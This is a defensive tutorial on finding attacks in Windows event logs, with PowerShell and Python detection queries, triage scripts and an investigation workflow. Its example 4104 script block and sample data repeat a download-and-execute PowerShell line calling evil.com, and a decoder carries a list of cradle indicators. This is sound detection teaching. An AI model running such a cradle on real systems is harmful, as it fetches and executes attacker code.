Windows Event Log Analysis

Level: intermediate | Time: 40 min | Format: Writeup

Analyzing Windows logs for security events

Learning Objectives

  • Navigate Windows Event Viewer
  • Identify key security events
  • Detect authentication attacks
  • Find lateral movement indicators

Windows Event Logs are the digital diary of everything that happens on a Windows system. Every login, every process, every error - it's all recorded. For defenders, these logs are gold. Attackers leave traces, and those traces are in the event logs.

Think of Windows Event Logs like security camera footage for your computer. When something bad happens (or is about to), reviewing the footage shows you exactly what occurred. The challenge? There's LOTS of footage, and you need to know what to look for.

Log Retention

By default, Windows keeps limited log history. For security, increase log size limits and consider forwarding logs to a SIEM for long-term storage. You can't investigate what you didn't save!

Event Log Locations

```text
Windows Event Log Types:

Primary Security-Relevant Logs:
─────────────────────────────────────────────────────────────────
Security Log (Most Important!)
├── Path: %SystemRoot%\System32\Winevt\Logs\Security.evtx
├── Content: Authentication, authorization, audit events
└── Key Events: Login/logoff, privilege use, object access

System Log
├── Path: %SystemRoot%\System32\Winevt\Logs\System.evtx
├── Content: System-level events, driver loading, services
└── Key Events: Service changes, system startup/shutdown

Application Log
├── Path: %SystemRoot%\System32\Winevt\Logs\Application.evtx
├── Content: Application-specific events
└── Key Events: App crashes, errors, updates

Additional Security Logs (Enable These!):
─────────────────────────────────────────────────────────────────
PowerShell Logs
├── Microsoft-Windows-PowerShell/Operational
├── Script Block Logging (Event 4104, written to the Operational channel above)
└── Critical for detecting PowerShell attacks!

Sysmon Logs (If installed - HIGHLY Recommended)
├── Microsoft-Windows-Sysmon/Operational
└── Process creation, network, file changes with full context

Windows Defender
├── Microsoft-Windows-Windows Defender/Operational
└── Malware detections and blocks

Windows Firewall
├── Microsoft-Windows-Windows Firewall With Advanced Security/Firewall
└── Connection attempts, blocks
```

Critical Event IDs

```text
Must-Know Security Event IDs:

AUTHENTICATION EVENTS
─────────────────────────────────────────────────────────────────
4624      │ Successful Logon
          │ Logon Types: 2=Interactive, 3=Network, 10=RDP
          │ Key fields: TargetUserName, LogonType, IpAddress

4625      │ Failed Logon
          │ Look for: Many failures = brute force
          │ Key fields: TargetUserName, FailureReason, IpAddress

4648      │ Explicit Credential Logon (runas, remote)
          │ Suspicious: Admin running as different user

4672      │ Special Privileges Assigned (Admin logon)
          │ Track: Who has elevated privileges

4634/4647 │ Logoff
          │ Pair with 4624 to determine session duration

ACCOUNT MANAGEMENT
─────────────────────────────────────────────────────────────────
4720      │ User Account Created
4722      │ User Account Enabled
4724      │ Password Reset Attempt
4725      │ User Account Disabled
4726      │ User Account Deleted
4728      │ Member Added to Security-Enabled Global Group
4732      │ Member Added to Local Group
4756      │ Member Added to Universal Security Group

PROCESS & EXECUTION
─────────────────────────────────────────────────────────────────
4688      │ Process Creation (requires audit policy enabled)
          │ CRITICAL for tracking command execution
          │ Fields: NewProcessName, CommandLine, ParentProcessName

4689      │ Process Termination

4657      │ Registry Value Modified

7045      │ Service Installed (System Log)
          │ Attackers often install malicious services
```

Enable Command Line Logging

By default, Event ID 4688 doesn't log the full command line! You must enable it via Group Policy or registry. Without command lines, you're only seeing process names - not enough for investigation.

Understanding Logon Types

```text
Logon Types in Event 4624:

Type 2  │ Interactive (Local console login)
        │ User physically at the keyboard
        │ Suspicious: 2 AM console login?

Type 3  │ Network (SMB, WMI, PowerShell Remoting)
        │ Most common for lateral movement!
        │ Suspicious: Workstation → Server with admin

Type 4  │ Batch (Scheduled task)
        │ Check: What task is running?

Type 5  │ Service (Service account)
        │ Normal for services starting

Type 7  │ Unlock (Workstation unlocked)
        │ User returned and unlocked

Type 8  │ NetworkCleartext (IIS Basic Auth)
        │ Credentials sent in cleartext!

Type 9  │ NewCredentials (RunAs /netonly)
        │ Outbound connections use different creds

Type 10 │ RemoteInteractive (RDP)
        │ Suspicious: Unexpected RDP sessions

Type 11 │ CachedInteractive (Cached credentials)
        │ Logged in with cached domain creds

Key for Investigation:
Type 3 + Admin account + unexpected source = INVESTIGATE!
Type 10 from external IP = potential compromise
```
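The "Key for Investigation" rules above can be applied mechanically to exported 4624 records. The following is an added example, not code from the original writeup: it runs over already-parsed records (the shape an EvtxECmd CSV or a SIEM export gives you), and the admin account names, internal ranges, jump-host address and quiet hours are assumptions constructed for the demo.

```python
"""Triage 4624 logon events by logon type.
Added example for this writeup, not code from the original page. It works on
already-parsed event records; the records, accounts and networks below are
constructed for the demo."""
import ipaddress
from datetime import datetime

LOGON_TYPES = {
    2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
    8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
    11: "CachedInteractive",
}

# Assumptions (constructed): which accounts are admins, which address ranges
# are internal, which hosts may originate admin network logons (a jump host),
# and which hours nobody should be at a console.
ADMIN_ACCOUNTS = {"administrator", "da_jsmith"}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
ADMIN_SOURCES = {"10.0.0.5"}
QUIET_HOURS = range(0, 6)


def is_internal(ip):
    """'-' (local logon) and loopback count as internal."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return addr.is_loopback or any(addr in net for net in INTERNAL_NETS)


def triage_logon(ev):
    """Return the investigation flags for one 4624 record."""
    flags = []
    ltype = int(ev["LogonType"])
    user = ev["TargetUserName"].lower()
    ip = ev.get("IpAddress", "-")
    hour = datetime.fromisoformat(ev["TimeCreated"]).hour
    if ltype == 3 and user in ADMIN_ACCOUNTS and ip not in ADMIN_SOURCES:
        flags.append("INVESTIGATE: admin network logon from unexpected source")
    if ltype == 10 and not is_internal(ip):
        flags.append("potential compromise: RDP from external IP")
    if ltype == 8:
        flags.append("NetworkCleartext: credentials sent in cleartext")
    if ltype == 2 and hour in QUIET_HOURS:
        flags.append("console logon during quiet hours")
    return flags


def triage_all(events):
    """Keep only flagged 4624 events as (time, user, logon type name, flags)."""
    out = []
    for ev in events:
        if ev["EventID"] != 4624:
            continue
        flags = triage_logon(ev)
        if flags:
            out.append((ev["TimeCreated"], ev["TargetUserName"],
                        LOGON_TYPES.get(int(ev["LogonType"]), "Unknown"), flags))
    return out


# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2024-03-01T09:15:00", "TargetUserName": "da_jsmith",
     "LogonType": 3, "IpAddress": "10.0.0.77"},      # admin, network, not the jump host
    {"EventID": 4624, "TimeCreated": "2024-03-01T09:16:00", "TargetUserName": "bob",
     "LogonType": 10, "IpAddress": "203.0.113.9"},   # RDP from outside
    {"EventID": 4624, "TimeCreated": "2024-03-01T02:14:00", "TargetUserName": "alice",
     "LogonType": 2, "IpAddress": "-"},              # console logon at 02:14
    {"EventID": 4624, "TimeCreated": "2024-03-01T09:17:00", "TargetUserName": "svc_backup",
     "LogonType": 5, "IpAddress": "-"},              # service logon, normal
    {"EventID": 4624, "TimeCreated": "2024-03-01T09:18:00", "TargetUserName": "da_jsmith",
     "LogonType": 3, "IpAddress": "10.0.0.5"},       # admin from the jump host, expected
]

if __name__ == "__main__":
    for when, user, kind, flags in triage_all(SAMPLE_EVENTS):
        print(when, user, kind, "; ".join(flags))
```

The allow-list of admin sources is what keeps this from paging on every legitimate admin session; tune it per environment, and treat a blank or `-` address as a local logon rather than an external one.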

Detecting Attack Patterns

```powershell
# Detecting Brute Force Attacks
# Multiple 4625 events from same source
# Properties[19] of a 4625 event is IpAddress

Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4625
    StartTime = (Get-Date).AddHours(-24)
} | Group-Object { $_.Properties[19].Value } |
    Where-Object { $_.Count -gt 10 } |
    Select-Object Name, Count

# Look for: Many failures followed by 4624 success = password found!
```

```powershell
# Detecting Lateral Movement
# Type 3 logins with admin privileges from workstations
# 4624 field order: [5]=TargetUserName, [8]=LogonType, [18]=IpAddress

Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4624
    StartTime = (Get-Date).AddHours(-24)
} | Where-Object {
    $_.Properties[8].Value -eq 3 -and            # Network logon
    $_.Properties[5].Value -match 'admin'        # Admin account
} | Select-Object TimeCreated,
    @{N='User';E={$_.Properties[5].Value}},
    @{N='SourceIP';E={$_.Properties[18].Value}}
```

```powershell
# Detecting Pass-the-Hash
# Look for NTLM logons (not Kerberos) with admin accounts
# Properties[10] of a 4624 event is AuthenticationPackageName

Get-WinEvent -FilterHashtable @{
    LogName = 'Security'
    Id      = 4624
} | Where-Object {
    $_.Properties[10].Value -eq 'NTLM' -and
    $_.Properties[8].Value -eq 3
} | Select-Object TimeCreated,
    @{N='User';E={$_.Properties[5].Value}},
    @{N='AuthPackage';E={$_.Properties[10].Value}},
    @{N='SourceIP';E={$_.Properties[18].Value}}
```

```powershell
# Detecting New Service Installation
# Event 7045 in System log ([0]=ServiceName, [1]=ImagePath)

Get-WinEvent -FilterHashtable @{
    LogName   = 'System'
    Id        = 7045
    StartTime = (Get-Date).AddDays(-7)
} | Select-Object TimeCreated,
    @{N='ServiceName';E={$_.Properties[0].Value}},
    @{N='ImagePath';E={$_.Properties[1].Value}}

# Look for:
# - Services with suspicious names
# - Paths to temp/unusual locations
# - Base64 in command line
```
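The brute-force query above counts 4625s per source; the comment under it ("many failures followed by a 4624 success") is the correlation that actually confirms a guessed password. Here is an added example, not code from the original writeup, that does both over exported 4625/4624 records (the dict fields stand in for Properties[19]/[18] in the live query) and also checks the spraying variant, where one source makes a few attempts against many accounts. All records are constructed.

```python
"""Brute-force and password-spray triage over exported 4625/4624 records.
Added example for this writeup, not code from the original page; records
are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def brute_force_report(events, threshold=10, window=timedelta(hours=24), now=None):
    """For each source IP with more than `threshold` 4625s inside the window:
    failure count, accounts targeted, and any 4624 from the same IP that
    followed the first failure (a guessed password looks exactly like that)."""
    now = now or max(ts(e) for e in events)
    start = now - window
    fails, wins = defaultdict(list), defaultdict(list)
    for ev in events:
        if ts(ev) < start:
            continue
        if ev["EventID"] == 4625:
            fails[ev["IpAddress"]].append(ev)
        elif ev["EventID"] == 4624:
            wins[ev["IpAddress"]].append(ev)
    report = {}
    for ip, fs in fails.items():
        if len(fs) <= threshold:
            continue
        first_fail = min(ts(f) for f in fs)
        later_wins = [w for w in wins.get(ip, []) if ts(w) > first_fail]
        report[ip] = {
            "failures": len(fs),
            "targets": sorted({f["TargetUserName"] for f in fs}),
            "success_for": sorted({w["TargetUserName"] for w in later_wins}),
        }
    return report


def spray_report(events, min_users=5):
    """Password spraying: one source, few attempts each, many accounts.
    Returns {ip: distinct accounts targeted} for sources at/above min_users."""
    users = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4625:
            users[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(u) for ip, u in users.items() if len(u) >= min_users}


def _rec(eid, when, user, ip):
    return {"EventID": eid, "TimeCreated": when, "TargetUserName": user, "IpAddress": ip}


# Constructed sample: 12 failures against 'administrator' from one external IP
# within two minutes, then a success from that IP; three failures from an
# internal host (below threshold); single attempts against eight accounts from
# a third host (spray); and one failure outside the 24 h window.
SAMPLE_EVENTS = (
    [_rec(4625, f"2024-03-01T14:2{i // 6}:{(i % 6) * 10:02d}", "administrator", "203.0.113.45")
     for i in range(12)]
    + [_rec(4624, "2024-03-01T14:23:15", "administrator", "203.0.113.45")]
    + [_rec(4625, f"2024-03-01T10:00:0{i}", "alice", "10.0.0.22") for i in range(3)]
    + [_rec(4625, f"2024-03-01T11:00:{i:02d}", f"user{i}", "10.0.0.99") for i in range(8)]
    + [_rec(4625, "2024-02-20T03:00:00", "administrator", "198.51.100.7")]
)

if __name__ == "__main__":
    for ip, info in brute_force_report(SAMPLE_EVENTS).items():
        print(ip, info)
    print("spray sources:", spray_report(SAMPLE_EVENTS))
```

Note that the spraying source never crosses the per-IP count threshold of the first query, which is why grouping by distinct TargetUserName is a separate check rather than a lower threshold on the same one.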

PowerShell Logging

```text
PowerShell Event IDs (Critical for Detecting Attacks):

Microsoft-Windows-PowerShell/Operational
─────────────────────────────────────────────────────────────────
4103 │ Module Logging
     │ Shows PowerShell cmdlets executed

4104 │ Script Block Logging (MOST IMPORTANT!)
     │ Logs the actual code being run
     │ Even logs decoded/deobfuscated commands!

4105 │ Script Block Logging Start
4106 │ Script Block Logging Stop

Enabling PowerShell Logging:
─────────────────────────────────────────────────────────────────
# Via Group Policy:
# Computer Configuration → Admin Templates →
# Windows Components → Windows PowerShell

# Enable:
# - Turn on Module Logging
# - Turn on PowerShell Script Block Logging
# - Turn on PowerShell Transcription (optional)

Example Malicious Script Block (4104):
─────────────────────────────────────────────────────────────────
ScriptBlockText: IEX (New-Object Net.WebClient).DownloadString
                 ('http://evil.com/payload.ps1')

This reveals:
- Downloading and executing remote script
- Attacker C2 server: evil.com
- Exact payload name: payload.ps1
```

Script Block Logging Magic

Even if attackers use -EncodedCommand or heavy obfuscation, Script Block Logging (4104) captures the DECODED version when PowerShell actually executes it. This is incredibly powerful for analysis!
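When Script Block Logging was not enabled, the only record of an encoded command is the process command line (4688 or Sysmon Event 1), which shows the base64 blob, not the script. The following added example, not code from the original writeup, decodes that blob the way powershell.exe does (base64 over UTF-16LE) and flags the download-cradle indicators from the 4104 example above; the sample command line is constructed from the writeup's own example script block, and the indicator list is an assumption to be tuned.

```python
"""Decode -EncodedCommand from a process command line and flag cradle
indicators. Added example for this writeup, not code from the original page;
the command line below is constructed."""
import base64
import re

# powershell.exe accepts -e, -ec, -en, -enc and -EncodedCommand.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Defensive indicator strings (assumed list); matched case-insensitively.
CRADLE_INDICATORS = [
    "IEX", "Invoke-Expression", "Net.WebClient", "DownloadString", "DownloadFile",
    "Invoke-WebRequest", "Start-BitsTransfer", "-nop", "-w hidden", "FromBase64String",
]


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded
    command, else None. Malformed base64 / UTF-16 also returns None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def cradle_indicators(text):
    low = text.lower()
    return [ind for ind in CRADLE_INDICATORS if ind.lower() in low]


def triage_commandline(cmdline):
    """Triage result for one 4688 / Sysmon 1 record: whether it was encoded,
    the script that actually ran, and the indicators found in either the
    outer command line or the decoded script."""
    decoded = decode_encoded_command(cmdline)
    scope = cmdline if decoded is None else cmdline + "\n" + decoded
    return {"encoded": decoded is not None,
            "script": decoded if decoded is not None else cmdline,
            "indicators": cradle_indicators(scope)}


# Constructed sample: the writeup's example cradle, encoded the way
# powershell.exe expects it.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -enc {ENCODED}"

if __name__ == "__main__":
    print(triage_commandline(SAMPLE_CMDLINE))
```

The outer command line is kept in scope on purpose: `-nop -w hidden` lives there, not in the decoded script, and is itself a useful signal.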

Sysmon - Enhanced Logging

```text
Sysmon (System Monitor) - Must-Have for Detection:

Installation:
sysmon64 -accepteula -i sysmonconfig.xml

Key Sysmon Event IDs:
─────────────────────────────────────────────────────────────────
Event 1        │ Process Creation (Better than 4688!)
               │ Includes: CommandLine, ParentImage, Hashes, User

Event 3        │ Network Connection
               │ Tracks outbound connections per process
               │ Essential for C2 detection

Event 7        │ Image Loaded (DLL loading)
               │ Detect DLL hijacking, side-loading

Event 8        │ CreateRemoteThread
               │ Process injection detection

Event 10       │ Process Access
               │ Credential dumping (lsass access)

Event 11       │ FileCreate
               │ Track file drops to disk

Event 12/13/14 │ Registry Events
               │ Persistence mechanisms

Event 22       │ DNS Query
               │ Track DNS for C2, data exfil

Why Sysmon vs Native Logging:
├── More detail (hashes, parent process)
├── Network connections per process
├── Highly configurable
└── Community configs available (SwiftOnSecurity, olafhartong)
```
```powershell
# Query Sysmon Process Creation
# Event 1 field order: [4]=Image, [10]=CommandLine, [20]=ParentImage
Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = (Get-Date).AddHours(-24)
} | Where-Object {
    $_.Properties[4].Value -like '*powershell*' -or
    $_.Properties[4].Value -like '*cmd*'
} | Select-Object TimeCreated,
    @{N='CommandLine';E={$_.Properties[10].Value}},
    @{N='ParentImage';E={$_.Properties[20].Value}}

# Query Sysmon Network Connections
# Event 3 field order: [4]=Image, [7]=Initiated, [14]=DestinationIp, [16]=DestinationPort
# ([6] is Protocol, so it cannot be used as an "internal" flag)
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Sysmon/Operational'
    Id      = 3
} | Where-Object {
    $_.Properties[7].Value -eq 'true' -and                                        # outbound
    $_.Properties[14].Value -notmatch '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.)'   # not an internal destination
} | Select-Object TimeCreated,
    @{N='Image';E={$_.Properties[4].Value}},
    @{N='DestIP';E={$_.Properties[14].Value}},
    @{N='DestPort';E={$_.Properties[16].Value}}
```

Log Analysis Tools

```bash
# Tools for Analyzing Windows Event Logs

# 1. Event Viewer (GUI)
eventvwr.msc
# Built-in, good for browsing, limited for large volumes

# 2. PowerShell Get-WinEvent (Command Line)
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624}
# Flexible, scriptable, great for hunting

# 3. LogParser (Microsoft - Free)
logparser "SELECT * FROM Security WHERE EventID=4625"
# SQL-like queries, fast for large files

# 4. EvtxECmd (Eric Zimmerman - Free)
EvtxECmd.exe -d C:\Logs --csv C:\Output
# Parses EVTX to CSV for easy analysis
# Great for IR, works on offline logs

# 5. Chainsaw (Free - Rust-based)
chainsaw hunt evtxfiles/ --rules sigma-rules/
# Applies Sigma rules to EVTX files
# Perfect for rapid detection

# 6. Hayabusa (Free - Fast Timeline)
hayabusa -d evtxfiles/ -o timeline.csv
# Creates attack timeline from logs
# Uses Sigma rules, very fast

# Example: Hunt with Chainsaw
./chainsaw hunt C:\Windows\System32\winevt\Logs \
    --rules ./sigma/rules/windows \
    --mapping ./mappings/sigma-event-logs-all.yml
```

Investigation Workflow

```text
Example Investigation: Suspected Compromise
═══════════════════════════════════════════════════════════════

Scenario: User reports strange behavior on workstation

STEP 1: Check Authentication
─────────────────────────────────────────────────────────────────
# Recent successful logins
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} |
    Select -First 50

Questions:
├── Any unusual logon types (10=RDP from unexpected source)?
├── Any network logons (type 3) from other workstations?
└── Any service account logins (type 5) at odd times?

STEP 2: Check for Failed Logins
─────────────────────────────────────────────────────────────────
# Brute force attempts?
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625} |
    Group { $_.Properties[19].Value } | Sort Count -Desc

STEP 3: Check Process Creation
─────────────────────────────────────────────────────────────────
# What ran on this system?
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4688} |
    Select TimeCreated, @{N='Process';E={$_.Properties[5].Value}}

Look for:
├── PowerShell with encoded commands
├── Processes from temp folders
├── Unusual parent-child relationships
└── Reconnaissance commands (whoami, net user, etc.)

STEP 4: Check PowerShell
─────────────────────────────────────────────────────────────────
Get-WinEvent -FilterHashtable @{
    LogName='Microsoft-Windows-PowerShell/Operational'
    Id=4104
}

Look for:
├── Download cradles (IEX, WebClient)
├── Encoded commands decoded
└── Reconnaissance scripts

STEP 5: Check New Services
─────────────────────────────────────────────────────────────────
Get-WinEvent -FilterHashtable @{LogName='System';Id=7045}

Look for:
├── Services with random names
├── Unusual binary paths
└── Services created around incident time

STEP 6: Build Timeline
─────────────────────────────────────────────────────────────────
Correlate all findings with timestamps:
14:23:00 - Failed RDP login from 192.168.1.50
14:23:15 - Successful login (password guessed?)
14:24:00 - PowerShell executed download cradle
14:25:00 - New service installed for persistence
14:26:00 - Network connection to external IP
```
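STEP 6 is where the separate channel exports get merged into one ordered story. The following is an added example, not code from the original writeup: it normalises records from Security, PowerShell/Operational, System and Sysmon into one sorted timeline and renders lines in the format shown above. The five records are constructed to match the writeup's scenario (service name, path and destination address are placeholders).

```python
"""Merge records from several event channels into one chronological timeline.
Added example for this writeup, not code from the original page; records are
constructed to mirror the STEP 6 scenario."""
from datetime import datetime


def summarize(ev):
    """One human-readable line of context per (channel, event id)."""
    eid, ch = ev["EventID"], ev["Channel"]
    if ch == "Security" and eid in (4624, 4625):
        outcome = "Successful" if eid == 4624 else "Failed"
        return (f"{outcome} logon (type {ev['LogonType']}) for "
                f"{ev['TargetUserName']} from {ev['IpAddress']}")
    if ch == "Microsoft-Windows-PowerShell/Operational" and eid == 4104:
        return f"Script block: {ev['ScriptBlockText']}"
    if ch == "System" and eid == 7045:
        return f"Service installed: {ev['ServiceName']} -> {ev['ImagePath']}"
    if ch == "Microsoft-Windows-Sysmon/Operational" and eid == 3:
        return (f"Network connection {ev['Image']} -> "
                f"{ev['DestinationIp']}:{ev['DestinationPort']}")
    return f"{ch} event {eid}"   # anything we have no renderer for still lands on the timeline


def build_timeline(events):
    """Return (datetime, channel, event id, summary) tuples sorted by time."""
    rows = [(datetime.fromisoformat(e["TimeCreated"]), e["Channel"], e["EventID"], summarize(e))
            for e in events]
    return sorted(rows, key=lambda r: r[0])


def render(timeline):
    return [f"{t:%H:%M:%S} - [{ch} {eid}] {s}" for t, ch, eid, s in timeline]


# Constructed sample, deliberately out of order as separate per-channel
# exports usually are. Names, paths and addresses are placeholders.
SAMPLE_EVENTS = [
    {"Channel": "System", "EventID": 7045, "TimeCreated": "2024-03-01T14:25:00",
     "ServiceName": "UpdaterSvc", "ImagePath": r"C:\Users\Public\updater.exe"},
    {"Channel": "Security", "EventID": 4625, "TimeCreated": "2024-03-01T14:23:00",
     "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "192.168.1.50"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "TimeCreated": "2024-03-01T14:26:00", "Image": r"C:\Users\Public\updater.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"Channel": "Security", "EventID": 4624, "TimeCreated": "2024-03-01T14:23:15",
     "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "192.168.1.50"},
    {"Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "TimeCreated": "2024-03-01T14:24:00",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"},
]

if __name__ == "__main__":
    for line in render(build_timeline(SAMPLE_EVENTS)):
        print(line)
```

Real exports need their timestamps normalised to one zone (EVTX stores UTC; EvtxECmd output is UTC by default) before sorting, otherwise the Security and Sysmon records can land in the wrong order.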

Log Analysis Methodology

Windows Event Log Investigation

  1. Define Scope: What system, what timeframe, what behavior?
  2. Check Authentication: 4624/4625/4672 - Who logged in?
  3. Check Execution: 4688/Sysmon 1 - What ran?
  4. Check PowerShell: 4104 - What scripts executed?
  5. Check Persistence: 7045/4698/Sysmon 12-14 - What stayed?
  6. Check Network: Sysmon 3/Firewall - Where connected?
  7. Build Timeline: Correlate events chronologically

Knowledge Check


Which Event ID indicates a successful logon?

Challenges

Hunt the Brute Force

Difficulty: intermediate

Write a PowerShell command to find all failed login attempts (4625) in the last 24 hours, grouped by source IP, showing counts above 5 attempts.


Key Takeaways

  • Security log is most important: 4624 (success), 4625 (fail), 4688 (process)
  • Logon Type 3 (network) + admin account = potential lateral movement
  • Enable PowerShell Script Block Logging (4104) - catches decoded commands
  • Install Sysmon for enhanced process, network, and registry logging
  • Tools like Chainsaw and Hayabusa apply Sigma rules to EVTX files
  • Always build a timeline when investigating incidents